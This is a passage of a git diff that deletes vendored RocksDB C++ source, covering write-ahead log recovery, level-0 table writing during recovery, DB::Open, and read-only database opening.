-        return s;
-      }
-    } else if (!s.ok()) {
-      assert(s.IsIOError());
-      return s;
-    }
-  }
-
-  Status s = versions_->Recover(column_families, read_only);
-  if (immutable_db_options_.paranoid_checks && s.ok()) {
-    s = CheckConsistency();
-  }
-  if (s.ok()) {
-    SequenceNumber next_sequence(kMaxSequenceNumber);
-    default_cf_handle_ = new ColumnFamilyHandleImpl(
-        versions_->GetColumnFamilySet()->GetDefault(), this, &mutex_);
-    default_cf_internal_stats_ = default_cf_handle_->cfd()->internal_stats();
-    single_column_family_mode_ =
-        versions_->GetColumnFamilySet()->NumberOfColumnFamilies() == 1;
-
-    // Recover from all newer log files than the ones named in the
-    // descriptor (new log files may have been added by the previous
-    // incarnation without registering them in the descriptor).
-    //
-    // Note that prev_log_number() is no longer used, but we pay
-    // attention to it in case we are recovering a database
-    // produced by an older version of rocksdb.
-    std::vector<std::string> filenames;
-    s = env_->GetChildren(immutable_db_options_.wal_dir, &filenames);
-    if (!s.ok()) {
-      return s;
-    }
-
-    std::vector<uint64_t> logs;
-    for (size_t i = 0; i < filenames.size(); i++) {
-      uint64_t number;
-      FileType type;
-      if (ParseFileName(filenames[i], &number, &type) && type == kLogFile) {
-        if (is_new_db) {
-          return Status::Corruption(
-              "While creating a new Db, wal_dir contains "
-              "existing log file: ",
-              filenames[i]);
-        } else {
-          logs.push_back(number);
-        }
-      }
-    }
-
-    if (logs.size() > 0) {
-      if (error_if_log_file_exist) {
-        return Status::Corruption(
-            "The db was opened in readonly mode with error_if_log_file_exist"
-            "flag but a log file already exists");
-      } else if (error_if_data_exists_in_logs) {
-        for (auto& log : logs) {
-          std::string fname = LogFileName(immutable_db_options_.wal_dir, log);
-          uint64_t bytes;
-          s = env_->GetFileSize(fname, &bytes);
-          if (s.ok()) {
-            if (bytes > 0) {
-              return Status::Corruption(
-                  "error_if_data_exists_in_logs is set but there are data "
-                  " in log files.");
-            }
-          }
-        }
-      }
-    }
-
-    if (!logs.empty()) {
-      // Recover in the order in which the logs were generated
-      std::sort(logs.begin(), logs.end());
-      s = RecoverLogFiles(logs, &next_sequence, read_only);
-      if (!s.ok()) {
-        // Clear memtables if recovery failed
-        for (auto cfd : *versions_->GetColumnFamilySet()) {
-          cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                 kMaxSequenceNumber);
-        }
-      }
-    }
-  }
-
-  // Initial value
-  max_total_in_memory_state_ = 0;
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
-    max_total_in_memory_state_ += mutable_cf_options->write_buffer_size *
-                                  mutable_cf_options->max_write_buffer_number;
-  }
-
-  return s;
-}
-
-// REQUIRES: log_numbers are sorted in ascending order
-Status DBImpl::RecoverLogFiles(const std::vector<uint64_t>& log_numbers,
-                               SequenceNumber* next_sequence, bool read_only) {
-  struct LogReporter : public log::Reader::Reporter {
-    Env* env;
-    Logger* info_log;
-    const char* fname;
-    Status* status;  // nullptr if immutable_db_options_.paranoid_checks==false
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      ROCKS_LOG_WARN(info_log, "%s%s: dropping %d bytes; %s",
-                     (this->status == nullptr ? "(ignoring error) " : ""),
-                     fname, static_cast<int>(bytes), s.ToString().c_str());
-      if (this->status != nullptr && this->status->ok()) {
-        *this->status = s;
-      }
-    }
-  };
-
-  mutex_.AssertHeld();
-  Status status;
-  std::unordered_map<int, VersionEdit> version_edits;
-  // no need to refcount because iteration is under mutex
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    VersionEdit edit;
-    edit.SetColumnFamily(cfd->GetID());
-    version_edits.insert({cfd->GetID(), edit});
-  }
-  int job_id = next_job_id_.fetch_add(1);
-  {
-    auto stream = event_logger_.Log();
-    stream << "job" << job_id << "event"
-           << "recovery_started";
-    stream << "log_files";
-    stream.StartArray();
-    for (auto log_number : log_numbers) {
-      stream << log_number;
-    }
-    stream.EndArray();
-  }
-
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.wal_filter != nullptr) {
-    std::map<std::string, uint32_t> cf_name_id_map;
-    std::map<uint32_t, uint64_t> cf_lognumber_map;
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      cf_name_id_map.insert(
-        std::make_pair(cfd->GetName(), cfd->GetID()));
-      cf_lognumber_map.insert(
-        std::make_pair(cfd->GetID(), cfd->GetLogNumber()));
-    }
-
-    immutable_db_options_.wal_filter->ColumnFamilyLogNumberMap(cf_lognumber_map,
-                                                               cf_name_id_map);
-  }
-#endif
-
-  bool stop_replay_by_wal_filter = false;
-  bool stop_replay_for_corruption = false;
-  bool flushed = false;
-  for (auto log_number : log_numbers) {
-    // The previous incarnation may not have written any MANIFEST
-    // records after allocating this log number.  So we manually
-    // update the file number allocation counter in VersionSet.
-    versions_->MarkFileNumberUsedDuringRecovery(log_number);
-    // Open the log file
-    std::string fname = LogFileName(immutable_db_options_.wal_dir, log_number);
-
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "Recovering log #%" PRIu64 " mode %d", log_number,
-                   immutable_db_options_.wal_recovery_mode);
-    auto logFileDropped = [this, &fname]() {
-      uint64_t bytes;
-      if (env_->GetFileSize(fname, &bytes).ok()) {
-        auto info_log = immutable_db_options_.info_log.get();
-        ROCKS_LOG_WARN(info_log, "%s: dropping %d bytes", fname.c_str(),
-                       static_cast<int>(bytes));
-      }
-    };
-    if (stop_replay_by_wal_filter) {
-      logFileDropped();
-      continue;
-    }
-
-    unique_ptr<SequentialFileReader> file_reader;
-    {
-      unique_ptr<SequentialFile> file;
-      status = env_->NewSequentialFile(fname, &file,
-                                       env_->OptimizeForLogRead(env_options_));
-      if (!status.ok()) {
-        MaybeIgnoreError(&status);
-        if (!status.ok()) {
-          return status;
-        } else {
-          // Fail with one log file, but that's ok.
-          // Try next one.
-          continue;
-        }
-      }
-      file_reader.reset(new SequentialFileReader(std::move(file)));
-    }
-
-    // Create the log reader.
-    LogReporter reporter;
-    reporter.env = env_;
-    reporter.info_log = immutable_db_options_.info_log.get();
-    reporter.fname = fname.c_str();
-    if (!immutable_db_options_.paranoid_checks ||
-        immutable_db_options_.wal_recovery_mode ==
-            WALRecoveryMode::kSkipAnyCorruptedRecords) {
-      reporter.status = nullptr;
-    } else {
-      reporter.status = &status;
-    }
-    // We intentially make log::Reader do checksumming even if
-    // paranoid_checks==false so that corruptions cause entire commits
-    // to be skipped instead of propagating bad information (like overly
-    // large sequence numbers).
-    log::Reader reader(immutable_db_options_.info_log, std::move(file_reader),
-                       &reporter, true /*checksum*/, 0 /*initial_offset*/,
-                       log_number);
-
-    // Determine if we should tolerate incomplete records at the tail end of the
-    // Read all the records and add to a memtable
-    std::string scratch;
-    Slice record;
-    WriteBatch batch;
-
-    while (!stop_replay_by_wal_filter &&
-           reader.ReadRecord(&record, &scratch,
-                             immutable_db_options_.wal_recovery_mode) &&
-           status.ok()) {
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter.Corruption(record.size(),
-                            Status::Corruption("log record too small"));
-        continue;
-      }
-      WriteBatchInternal::SetContents(&batch, record);
-      SequenceNumber sequence = WriteBatchInternal::Sequence(&batch);
-
-      if (immutable_db_options_.wal_recovery_mode ==
-          WALRecoveryMode::kPointInTimeRecovery) {
-        // In point-in-time recovery mode, if sequence id of log files are
-        // consecutive, we continue recovery despite corruption. This could
-        // happen when we open and write to a corrupted DB, where sequence id
-        // will start from the last sequence id we recovered.
-        if (sequence == *next_sequence) {
-          stop_replay_for_corruption = false;
-        }
-        if (stop_replay_for_corruption) {
-          logFileDropped();
-          break;
-        }
-      }
-
-#ifndef ROCKSDB_LITE
-      if (immutable_db_options_.wal_filter != nullptr) {
-        WriteBatch new_batch;
-        bool batch_changed = false;
-
-        WalFilter::WalProcessingOption wal_processing_option =
-            immutable_db_options_.wal_filter->LogRecordFound(
-                log_number, fname, batch, &new_batch, &batch_changed);
-
-        switch (wal_processing_option) {
-          case WalFilter::WalProcessingOption::kContinueProcessing:
-            // do nothing, proceeed normally
-            break;
-          case WalFilter::WalProcessingOption::kIgnoreCurrentRecord:
-            // skip current record
-            continue;
-          case WalFilter::WalProcessingOption::kStopReplay:
-            // skip current record and stop replay
-            stop_replay_by_wal_filter = true;
-            continue;
-          case WalFilter::WalProcessingOption::kCorruptedRecord: {
-            status =
-                Status::Corruption("Corruption reported by Wal Filter ",
-                                   immutable_db_options_.wal_filter->Name());
-            MaybeIgnoreError(&status);
-            if (!status.ok()) {
-              reporter.Corruption(record.size(), status);
-              continue;
-            }
-            break;
-          }
-          default: {
-            assert(false);  // unhandled case
-            status = Status::NotSupported(
-                "Unknown WalProcessingOption returned"
-                " by Wal Filter ",
-                immutable_db_options_.wal_filter->Name());
-            MaybeIgnoreError(&status);
-            if (!status.ok()) {
-              return status;
-            } else {
-              // Ignore the error with current record processing.
-              continue;
-            }
-          }
-        }
-
-        if (batch_changed) {
-          // Make sure that the count in the new batch is
-          // within the orignal count.
-          int new_count = WriteBatchInternal::Count(&new_batch);
-          int original_count = WriteBatchInternal::Count(&batch);
-          if (new_count > original_count) {
-            ROCKS_LOG_FATAL(
-                immutable_db_options_.info_log,
-                "Recovering log #%" PRIu64
-                " mode %d log filter %s returned "
-                "more records (%d) than original (%d) which is not allowed. "
-                "Aborting recovery.",
-                log_number, immutable_db_options_.wal_recovery_mode,
-                immutable_db_options_.wal_filter->Name(), new_count,
-                original_count);
-            status = Status::NotSupported(
-                "More than original # of records "
-                "returned by Wal Filter ",
-                immutable_db_options_.wal_filter->Name());
-            return status;
-          }
-          // Set the same sequence number in the new_batch
-          // as the original batch.
-          WriteBatchInternal::SetSequence(&new_batch,
-                                          WriteBatchInternal::Sequence(&batch));
-          batch = new_batch;
-        }
-      }
-#endif  // ROCKSDB_LITE
-
-      // If column family was not found, it might mean that the WAL write
-      // batch references to the column family that was dropped after the
-      // insert. We don't want to fail the whole write batch in that case --
-      // we just ignore the update.
-      // That's why we set ignore missing column families to true
-      bool has_valid_writes = false;
-      status = WriteBatchInternal::InsertInto(
-          &batch, column_family_memtables_.get(), &flush_scheduler_, true,
-          log_number, this, false /* concurrent_memtable_writes */,
-          next_sequence, &has_valid_writes);
-      MaybeIgnoreError(&status);
-      if (!status.ok()) {
-        // We are treating this as a failure while reading since we read valid
-        // blocks that do not form coherent data
-        reporter.Corruption(record.size(), status);
-        continue;
-      }
-
-      if (has_valid_writes && !read_only) {
-        // we can do this because this is called before client has access to the
-        // DB and there is only a single thread operating on DB
-        ColumnFamilyData* cfd;
-
-        while ((cfd = flush_scheduler_.TakeNextColumnFamily()) != nullptr) {
-          cfd->Unref();
-          // If this asserts, it means that InsertInto failed in
-          // filtering updates to already-flushed column families
-          assert(cfd->GetLogNumber() <= log_number);
-          auto iter = version_edits.find(cfd->GetID());
-          assert(iter != version_edits.end());
-          VersionEdit* edit = &iter->second;
-          status = WriteLevel0TableForRecovery(job_id, cfd, cfd->mem(), edit);
-          if (!status.ok()) {
-            // Reflect errors immediately so that conditions like full
-            // file-systems cause the DB::Open() to fail.
-            return status;
-          }
-          flushed = true;
-
-          cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                 *next_sequence);
-        }
-      }
-    }
-
-    if (!status.ok()) {
-      if (immutable_db_options_.wal_recovery_mode ==
-          WALRecoveryMode::kSkipAnyCorruptedRecords) {
-        // We should ignore all errors unconditionally
-        status = Status::OK();
-      } else if (immutable_db_options_.wal_recovery_mode ==
-                 WALRecoveryMode::kPointInTimeRecovery) {
-        // We should ignore the error but not continue replaying
-        status = Status::OK();
-        stop_replay_for_corruption = true;
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "Point in time recovered to log #%" PRIu64
-                       " seq #%" PRIu64,
-                       log_number, *next_sequence);
-      } else {
-        assert(immutable_db_options_.wal_recovery_mode ==
-                   WALRecoveryMode::kTolerateCorruptedTailRecords ||
-               immutable_db_options_.wal_recovery_mode ==
-                   WALRecoveryMode::kAbsoluteConsistency);
-        return status;
-      }
-    }
-
-    flush_scheduler_.Clear();
-    auto last_sequence = *next_sequence - 1;
-    if ((*next_sequence != kMaxSequenceNumber) &&
-        (versions_->LastSequence() <= last_sequence)) {
-      versions_->SetLastToBeWrittenSequence(last_sequence);
-      versions_->SetLastSequence(last_sequence);
-    }
-  }
-
-  // True if there's any data in the WALs; if not, we can skip re-processing
-  // them later
-  bool data_seen = false;
-  if (!read_only) {
-    // no need to refcount since client still doesn't have access
-    // to the DB and can not drop column families while we iterate
-    auto max_log_number = log_numbers.back();
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      auto iter = version_edits.find(cfd->GetID());
-      assert(iter != version_edits.end());
-      VersionEdit* edit = &iter->second;
-
-      if (cfd->GetLogNumber() > max_log_number) {
-        // Column family cfd has already flushed the data
-        // from all logs. Memtable has to be empty because
-        // we filter the updates based on log_number
-        // (in WriteBatch::InsertInto)
-        assert(cfd->mem()->GetFirstSequenceNumber() == 0);
-        assert(edit->NumEntries() == 0);
-        continue;
-      }
-
-      // flush the final memtable (if non-empty)
-      if (cfd->mem()->GetFirstSequenceNumber() != 0) {
-        // If flush happened in the middle of recovery (e.g. due to memtable
-        // being full), we flush at the end. Otherwise we'll need to record
-        // where we were on last flush, which make the logic complicated.
-        if (flushed || !immutable_db_options_.avoid_flush_during_recovery) {
-          status = WriteLevel0TableForRecovery(job_id, cfd, cfd->mem(), edit);
-          if (!status.ok()) {
-            // Recovery failed
-            break;
-          }
-          flushed = true;
-
-          cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                 versions_->LastSequence());
-        }
-        data_seen = true;
-      }
-
-      // write MANIFEST with update
-      // writing log_number in the manifest means that any log file
-      // with number strongly less than (log_number + 1) is already
-      // recovered and should be ignored on next reincarnation.
-      // Since we already recovered max_log_number, we want all logs
-      // with numbers `<= max_log_number` (includes this one) to be ignored
-      if (flushed || cfd->mem()->GetFirstSequenceNumber() == 0) {
-        edit->SetLogNumber(max_log_number + 1);
-      }
-      // we must mark the next log number as used, even though it's
-      // not actually used. that is because VersionSet assumes
-      // VersionSet::next_file_number_ always to be strictly greater than any
-      // log number
-      versions_->MarkFileNumberUsedDuringRecovery(max_log_number + 1);
-      status = versions_->LogAndApply(
-          cfd, *cfd->GetLatestMutableCFOptions(), edit, &mutex_);
-      if (!status.ok()) {
-        // Recovery failed
-        break;
-      }
-    }
-  }
-
-  if (data_seen && !flushed) {
-    // Mark these as alive so they'll be considered for deletion later by
-    // FindObsoleteFiles()
-    if (concurrent_prepare_) {
-      log_write_mutex_.Lock();
-    }
-    for (auto log_number : log_numbers) {
-      alive_log_files_.push_back(LogFileNumberSize(log_number));
-    }
-    if (concurrent_prepare_) {
-      log_write_mutex_.Unlock();
-    }
-  }
-
-  event_logger_.Log() << "job" << job_id << "event"
-                      << "recovery_finished";
-
-  return status;
-}
-
-Status DBImpl::WriteLevel0TableForRecovery(int job_id, ColumnFamilyData* cfd,
-                                           MemTable* mem, VersionEdit* edit) {
-  mutex_.AssertHeld();
-  const uint64_t start_micros = env_->NowMicros();
-  FileMetaData meta;
-  auto pending_outputs_inserted_elem =
-      CaptureCurrentFileNumberInPendingOutputs();
-  meta.fd = FileDescriptor(versions_->NewFileNumber(), 0, 0);
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  Arena arena;
-  Status s;
-  TableProperties table_properties;
-  {
-    ScopedArenaIterator iter(mem->NewIterator(ro, &arena));
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[%s] [WriteLevel0TableForRecovery]"
-                    " Level-0 table #%" PRIu64 ": started",
-                    cfd->GetName().c_str(), meta.fd.GetNumber());
-
-    // Get the latest mutable cf options while the mutex is still locked
-    const MutableCFOptions mutable_cf_options =
-        *cfd->GetLatestMutableCFOptions();
-    bool paranoid_file_checks =
-        cfd->GetLatestMutableCFOptions()->paranoid_file_checks;
-
-    int64_t _current_time = 0;
-    env_->GetCurrentTime(&_current_time);  // ignore error
-    const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-    {
-      mutex_.Unlock();
-
-      SequenceNumber earliest_write_conflict_snapshot;
-      std::vector<SequenceNumber> snapshot_seqs =
-          snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-      EnvOptions optimized_env_options =
-          env_->OptimizeForCompactionTableWrite(env_options_, immutable_db_options_);
-      s = BuildTable(
-          dbname_, env_, *cfd->ioptions(), mutable_cf_options,
-          optimized_env_options, cfd->table_cache(), iter.get(),
-          std::unique_ptr<InternalIterator>(mem->NewRangeTombstoneIterator(ro)),
-          &meta, cfd->internal_comparator(),
-          cfd->int_tbl_prop_collector_factories(), cfd->GetID(), cfd->GetName(),
-          snapshot_seqs, earliest_write_conflict_snapshot,
-          GetCompressionFlush(*cfd->ioptions(), mutable_cf_options),
-          cfd->ioptions()->compression_opts, paranoid_file_checks,
-          cfd->internal_stats(), TableFileCreationReason::kRecovery,
-          &event_logger_, job_id, Env::IO_HIGH, nullptr /* table_properties */,
-          -1 /* level */, current_time);
-      LogFlush(immutable_db_options_.info_log);
-      ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                      "[%s] [WriteLevel0TableForRecovery]"
-                      " Level-0 table #%" PRIu64 ": %" PRIu64 " bytes %s",
-                      cfd->GetName().c_str(), meta.fd.GetNumber(),
-                      meta.fd.GetFileSize(), s.ToString().c_str());
-      mutex_.Lock();
-    }
-  }
-  ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-  // Note that if file_size is zero, the file has been deleted and
-  // should not be added to the manifest.
-  int level = 0;
-  if (s.ok() && meta.fd.GetFileSize() > 0) {
-    edit->AddFile(level, meta.fd.GetNumber(), meta.fd.GetPathId(),
-                  meta.fd.GetFileSize(), meta.smallest, meta.largest,
-                  meta.smallest_seqno, meta.largest_seqno,
-                  meta.marked_for_compaction);
-  }
-
-  InternalStats::CompactionStats stats(1);
-  stats.micros = env_->NowMicros() - start_micros;
-  stats.bytes_written = meta.fd.GetFileSize();
-  stats.num_output_files = 1;
-  cfd->internal_stats()->AddCompactionStats(level, stats);
-  cfd->internal_stats()->AddCFStats(
-      InternalStats::BYTES_FLUSHED, meta.fd.GetFileSize());
-  RecordTick(stats_, COMPACT_WRITE_BYTES, meta.fd.GetFileSize());
-  return s;
-}
-
-Status DB::Open(const Options& options, const std::string& dbname, DB** dbptr) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = DB::Open(db_options, dbname, column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status DB::Open(const DBOptions& db_options, const std::string& dbname,
-                const std::vector<ColumnFamilyDescriptor>& column_families,
-                std::vector<ColumnFamilyHandle*>* handles, DB** dbptr) {
-  Status s = SanitizeOptionsByTable(db_options, column_families);
-  if (!s.ok()) {
-    return s;
-  }
-
-  s = ValidateOptions(db_options, column_families);
-  if (!s.ok()) {
-    return s;
-  }
-
-  *dbptr = nullptr;
-  handles->clear();
-
-  size_t max_write_buffer_size = 0;
-  for (auto cf : column_families) {
-    max_write_buffer_size =
-        std::max(max_write_buffer_size, cf.options.write_buffer_size);
-  }
-
-  DBImpl* impl = new DBImpl(db_options, dbname);
-  s = impl->env_->CreateDirIfMissing(impl->immutable_db_options_.wal_dir);
-  if (s.ok()) {
-    for (auto db_path : impl->immutable_db_options_.db_paths) {
-      s = impl->env_->CreateDirIfMissing(db_path.path);
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-
-  if (!s.ok()) {
-    delete impl;
-    return s;
-  }
-
-  s = impl->CreateArchivalDirectory();
-  if (!s.ok()) {
-    delete impl;
-    return s;
-  }
-  impl->mutex_.Lock();
-  // Handles create_if_missing, error_if_exists
-  s = impl->Recover(column_families);
-  if (s.ok()) {
-    uint64_t new_log_number = impl->versions_->NewFileNumber();
-    unique_ptr<WritableFile> lfile;
-    EnvOptions soptions(db_options);
-    EnvOptions opt_env_options =
-        impl->immutable_db_options_.env->OptimizeForLogWrite(
-            soptions, BuildDBOptions(impl->immutable_db_options_,
-                                     impl->mutable_db_options_));
-    s = NewWritableFile(
-        impl->immutable_db_options_.env,
-        LogFileName(impl->immutable_db_options_.wal_dir, new_log_number),
-        &lfile, opt_env_options);
-    if (s.ok()) {
-      lfile->SetPreallocationBlockSize(
-          impl->GetWalPreallocateBlockSize(max_write_buffer_size));
-      {
-        InstrumentedMutexLock wl(&impl->log_write_mutex_);
-        impl->logfile_number_ = new_log_number;
-        unique_ptr<WritableFileWriter> file_writer(
-            new WritableFileWriter(std::move(lfile), opt_env_options));
-        impl->logs_.emplace_back(
-            new_log_number,
-            new log::Writer(
-                std::move(file_writer), new_log_number,
-                impl->immutable_db_options_.recycle_log_file_num > 0));
-      }
-
-      // set column family handles
-      for (auto cf : column_families) {
-        auto cfd =
-            impl->versions_->GetColumnFamilySet()->GetColumnFamily(cf.name);
-        if (cfd != nullptr) {
-          handles->push_back(
-              new ColumnFamilyHandleImpl(cfd, impl, &impl->mutex_));
-          impl->NewThreadStatusCfInfo(cfd);
-        } else {
-          if (db_options.create_missing_column_families) {
-            // missing column family, create it
-            ColumnFamilyHandle* handle;
-            impl->mutex_.Unlock();
-            s = impl->CreateColumnFamily(cf.options, cf.name, &handle);
-            impl->mutex_.Lock();
-            if (s.ok()) {
-              handles->push_back(handle);
-            } else {
-              break;
-            }
-          } else {
-            s = Status::InvalidArgument("Column family not found: ", cf.name);
-            break;
-          }
-        }
-      }
-    }
-    if (s.ok()) {
-      for (auto cfd : *impl->versions_->GetColumnFamilySet()) {
-        delete impl->InstallSuperVersionAndScheduleWork(
-            cfd, nullptr, *cfd->GetLatestMutableCFOptions());
-      }
-      if (impl->concurrent_prepare_) {
-        impl->log_write_mutex_.Lock();
-      }
-      impl->alive_log_files_.push_back(
-          DBImpl::LogFileNumberSize(impl->logfile_number_));
-      if (impl->concurrent_prepare_) {
-        impl->log_write_mutex_.Unlock();
-      }
-      impl->DeleteObsoleteFiles();
-      s = impl->directories_.GetDbDir()->Fsync();
-    }
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *impl->versions_->GetColumnFamilySet()) {
-      if (cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-        auto* vstorage = cfd->current()->storage_info();
-        for (int i = 1; i < vstorage->num_levels(); ++i) {
-          int num_files = vstorage->NumLevelFiles(i);
-          if (num_files > 0) {
-            s = Status::InvalidArgument(
-                "Not all files are at level 0. Cannot "
-                "open with FIFO compaction style.");
-            break;
-          }
-        }
-      }
-      if (!cfd->mem()->IsSnapshotSupported()) {
-        impl->is_snapshot_supported_ = false;
-      }
-      if (cfd->ioptions()->merge_operator != nullptr &&
-          !cfd->mem()->IsMergeOperatorSupported()) {
-        s = Status::InvalidArgument(
-            "The memtable of column family %s does not support merge operator "
-            "its options.merge_operator is non-null", cfd->GetName().c_str());
-      }
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-  TEST_SYNC_POINT("DBImpl::Open:Opened");
-  Status persist_options_status;
-  if (s.ok()) {
-    // Persist RocksDB Options before scheduling the compaction.
-    // The WriteOptionsFile() will release and lock the mutex internally.
-    persist_options_status = impl->WriteOptionsFile(
-        false /*need_mutex_lock*/, false /*need_enter_write_thread*/);
-
-    *dbptr = impl;
-    impl->opened_successfully_ = true;
-    impl->MaybeScheduleFlushOrCompaction();
-  }
-  impl->mutex_.Unlock();
-
-#ifndef ROCKSDB_LITE
-  auto sfm = static_cast<SstFileManagerImpl*>(
-      impl->immutable_db_options_.sst_file_manager.get());
-  if (s.ok() && sfm) {
-    // Notify SstFileManager about all sst files that already exist in
-    // db_paths[0] when the DB is opened.
-    auto& db_path = impl->immutable_db_options_.db_paths[0];
-    std::vector<std::string> existing_files;
-    impl->immutable_db_options_.env->GetChildren(db_path.path, &existing_files);
-    for (auto& file_name : existing_files) {
-      uint64_t file_number;
-      FileType file_type;
-      std::string file_path = db_path.path + "/" + file_name;
-      if (ParseFileName(file_name, &file_number, &file_type) &&
-          file_type == kTableFile) {
-        sfm->OnAddFile(file_path);
-      }
-    }
-  }
-#endif  // !ROCKSDB_LITE
-
-  if (s.ok()) {
-    ROCKS_LOG_INFO(impl->immutable_db_options_.info_log, "DB pointer %p", impl);
-    LogFlush(impl->immutable_db_options_.info_log);
-    if (!persist_options_status.ok()) {
-      s = Status::IOError(
-          "DB::Open() failed --- Unable to persist Options file",
-          persist_options_status.ToString());
-    }
-  }
-  if (!s.ok()) {
-    for (auto* h : *handles) {
-      delete h;
-    }
-    handles->clear();
-    delete impl;
-    *dbptr = nullptr;
-  }
-  return s;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_readonly.cc b/thirdparty/rocksdb/db/db_impl_readonly.cc
deleted file mode 100644
index d69eecb..0000000
--- a/thirdparty/rocksdb/db/db_impl_readonly.cc
+++ /dev/null
@@ -1,197 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/db_impl_readonly.h"
-
-#include "db/compacted_db_impl.h"
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "monitoring/perf_context_imp.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-DBImplReadOnly::DBImplReadOnly(const DBOptions& db_options,
-                               const std::string& dbname)
-    : DBImpl(db_options, dbname) {
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "Opening the db in read only mode");
-  LogFlush(immutable_db_options_.info_log);
-}
-
-DBImplReadOnly::~DBImplReadOnly() {
-}
-
-// Implementations of the DB interface
-Status DBImplReadOnly::Get(const ReadOptions& read_options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           PinnableSlice* pinnable_val) {
-  assert(pinnable_val != nullptr);
-  Status s;
-  SequenceNumber snapshot = versions_->LastSequence();
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* super_version = cfd->GetSuperVersion();
-  MergeContext merge_context;
-  RangeDelAggregator range_del_agg(cfd->internal_comparator(), snapshot);
-  LookupKey lkey(key, snapshot);
-  if (super_version->mem->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context,
-                              &range_del_agg, read_options)) {
-    pinnable_val->PinSelf();
-  } else {
-    PERF_TIMER_GUARD(get_from_output_files_time);
-    super_version->current->Get(read_options, lkey, pinnable_val, &s,
-                                &merge_context, &range_del_agg);
-  }
-  return s;
-}
-
-Iterator* DBImplReadOnly::NewIterator(const ReadOptions& read_options,
-                                      ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* super_version = cfd->GetSuperVersion()->Ref();
-  SequenceNumber latest_snapshot = versions_->LastSequence();
-  auto db_iter = NewArenaWrappedDbIterator(
-      env_, read_options, *cfd->ioptions(),
-      (read_options.snapshot != nullptr
-           ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                 ->number_
-           : latest_snapshot),
-      super_version->mutable_cf_options.max_sequential_skip_in_iterations,
-      super_version->version_number);
-  auto internal_iter =
-      NewInternalIterator(read_options, cfd, super_version, db_iter->GetArena(),
-                          db_iter->GetRangeDelAggregator());
-  db_iter->SetIterUnderDBIter(internal_iter);
-  return db_iter;
-}
-
-Status DBImplReadOnly::NewIterators(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_families,
-    std::vector<Iterator*>* iterators) {
-  if (iterators == nullptr) {
-    return Status::InvalidArgument("iterators not allowed to be nullptr");
-  }
-  iterators->clear();
-  iterators->reserve(column_families.size());
-  SequenceNumber latest_snapshot = versions_->LastSequence();
-
-  for (auto cfh : column_families) {
-    auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-    auto* sv = cfd->GetSuperVersion()->Ref();
-    auto* db_iter = NewArenaWrappedDbIterator(
-        env_, read_options, *cfd->ioptions(),
-        (read_options.snapshot != nullptr
-             ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                   ->number_
-             : latest_snapshot),
-        sv->mutable_cf_options.max_sequential_skip_in_iterations,
-        sv->version_number);
-    auto* internal_iter =
-        NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(),
-                            db_iter->GetRangeDelAggregator());
-    db_iter->SetIterUnderDBIter(internal_iter);
-    iterators->push_back(db_iter);
-  }
-
-  return Status::OK();
-}
-
-Status DB::OpenForReadOnly(const Options& options, const std::string& dbname,
-                           DB** dbptr, bool error_if_log_file_exist) {
-  *dbptr = nullptr;
-
-  // Try to first open DB as fully compacted DB
-  Status s;
-  s = CompactedDBImpl::Open(options, dbname, dbptr);
-  if (s.ok()) {
-    return s;
-  }
-
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-
-  s = DB::OpenForReadOnly(db_options, dbname, column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a
